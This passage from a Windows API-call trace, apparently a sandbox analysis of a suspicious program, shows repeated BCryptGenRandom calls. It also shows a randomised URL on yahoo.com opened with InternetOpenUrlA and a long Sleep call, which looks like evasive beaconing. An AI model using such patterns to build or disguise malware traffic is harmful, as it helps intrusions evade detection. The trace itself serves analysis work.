hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.191] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.191] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.192] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.192] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.226] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.226] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.226] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.227] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.227] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.227] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.227] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.228] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.228] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.228] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.228] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0220.228] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.229] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.229] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0220.229] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0220.230] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.230] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.230] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.231] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0220.231] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0220.231] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17e0c, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x3a17e0c) returned 0x0 [0220.231] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.231] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.232] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.232] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.233] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0220.233] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.233] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.234] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.234] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.234] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0220.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.235] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0220.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.236] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.681] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0220.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.682] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.682] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0220.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a17e26, cbBuffer=0x1a, dwFlags=0x2 | out: pbBuffer=0x3a17e26) returned 0x0 [0220.683] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0220.684] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.684] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.684] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.685] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.685] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.685] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.685] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.685] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.686] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.686] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.686] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.686] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.686] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.687] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0220.687] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.687] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.687] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.687] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.688] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0220.688] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.688] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.688] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.689] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.689] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0220.689] GetProcessHeap () returned 0x440000 [0220.689] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0220.689] lstrcpyA (in: lpString1=0x4726f0, lpString2="\"Úqîs://www.yahoo.com" | out: lpString1="\"Úqîs://www.yahoo.com") returned="\"Úqîs://www.yahoo.com" [0220.689] lstrcatA (in: lpString1="\"Úqîs://www.yahoo.com", lpString2="/OxxvybSsBw7qqhvjldgxpq5ugl35merde8vi79ujr7/anscl71Dmcdcqro58px3t5jws/c2fgfZjxfymaitqY2yyUn9nsa/" | out: lpString1="\"Úqîs://www.yahoo.com/OxxvybSsBw7qqhvjldgxpq5ugl35merde8vi79ujr7/anscl71Dmcdcqro58px3t5jws/c2fgfZjxfymaitqY2yyUn9nsa/") returned="\"Úqîs://www.yahoo.com/OxxvybSsBw7qqhvjldgxpq5ugl35merde8vi79ujr7/anscl71Dmcdcqro58px3t5jws/c2fgfZjxfymaitqY2yyUn9nsa/" [0220.689] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0220.689] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\"Úqîs://www.yahoo.com/OxxvybSsBw7qqhvjldgxpq5ugl35merde8vi79ujr7/anscl71Dmcdcqro58px3t5jws/c2fgfZjxfymaitqY2yyUn9nsa/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0220.690] GetProcessHeap () returned 0x440000 [0220.690] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0220.690] GetProcessHeap () returned 0x440000 [0220.690] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a17de0 | out: hHeap=0x440000) returned 1 [0220.690] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0220.690] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0220.691] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0220.691] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0220.691] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0220.691] Sleep (dwMilliseconds=0x1ac7b) [0221.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0221.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0221.044] GetProcessHeap () returned 0x440000 [0221.044] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a01750 [0221.044] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.044] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0221.045] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a01751, cbBuffer=0x2a, dwFlags=0x2 | out: pbBuffer=0x3a01751) returned 0x0 [0221.045] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.045] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.045] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.046] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0221.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.047] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.047] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.048] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.048] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0221.049] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.049] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0221.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0221.050] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0221.050] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 